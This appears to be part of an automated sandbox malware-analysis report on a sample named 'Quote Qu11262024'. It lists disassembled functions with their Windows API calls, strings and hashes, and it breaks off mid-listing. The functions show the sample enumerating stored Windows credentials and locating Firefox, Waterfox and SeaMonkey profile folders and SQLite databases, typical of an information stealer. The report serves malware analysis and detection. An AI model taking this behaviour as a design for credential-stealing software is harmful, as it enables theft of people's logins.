                                                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                    • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040A824
                                                                                                    • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                                                    • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                    • String ID: C:\Windows\system32
                                                                                                    • API String ID: 669240632-2896066436
                                                                                                    • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                    • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                    • memset.MSVCRT ref: 0040BE91
                                                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 697348961-0
                                                                                                    • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                    • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403CBF
                                                                                                    • memset.MSVCRT ref: 00403CD4
                                                                                                    • memset.MSVCRT ref: 00403CE9
                                                                                                    • memset.MSVCRT ref: 00403CFE
                                                                                                    • memset.MSVCRT ref: 00403D13
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                    • memset.MSVCRT ref: 00403DDA
                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                                                    • API String ID: 4039892925-11920434
                                                                                                    • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                    • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403E50
                                                                                                    • memset.MSVCRT ref: 00403E65
                                                                                                    • memset.MSVCRT ref: 00403E7A
                                                                                                    • memset.MSVCRT ref: 00403E8F
                                                                                                    • memset.MSVCRT ref: 00403EA4
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                    • memset.MSVCRT ref: 00403F6B
                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                    • API String ID: 4039892925-2068335096
                                                                                                    • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                    • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403FE1
                                                                                                    • memset.MSVCRT ref: 00403FF6
                                                                                                    • memset.MSVCRT ref: 0040400B
                                                                                                    • memset.MSVCRT ref: 00404020
                                                                                                    • memset.MSVCRT ref: 00404035
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                    • memset.MSVCRT ref: 004040FC
                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                    • API String ID: 4039892925-3369679110
                                                                                                    • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                    • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                    • API String ID: 3510742995-2641926074
                                                                                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2941347001-0
                                                                                                    • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                    • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403C09
                                                                                                    • memset.MSVCRT ref: 00403C1E
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                    • API String ID: 1534475566-1174173950
                                                                                                    • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                    • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                    • memset.MSVCRT ref: 00414C87
                                                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 71295984-2036018995
                                                                                                    • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                    • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                    APIs
                                                                                                    • wcschr.MSVCRT ref: 00414458
                                                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                    • String ID: "%s"
                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                    • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                    • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004087D6
                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                    • memset.MSVCRT ref: 00408828
                                                                                                    • memset.MSVCRT ref: 00408840
                                                                                                    • memset.MSVCRT ref: 00408858
                                                                                                    • memset.MSVCRT ref: 00408870
                                                                                                    • memset.MSVCRT ref: 00408888
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2911713577-0
                                                                                                    • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                    • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
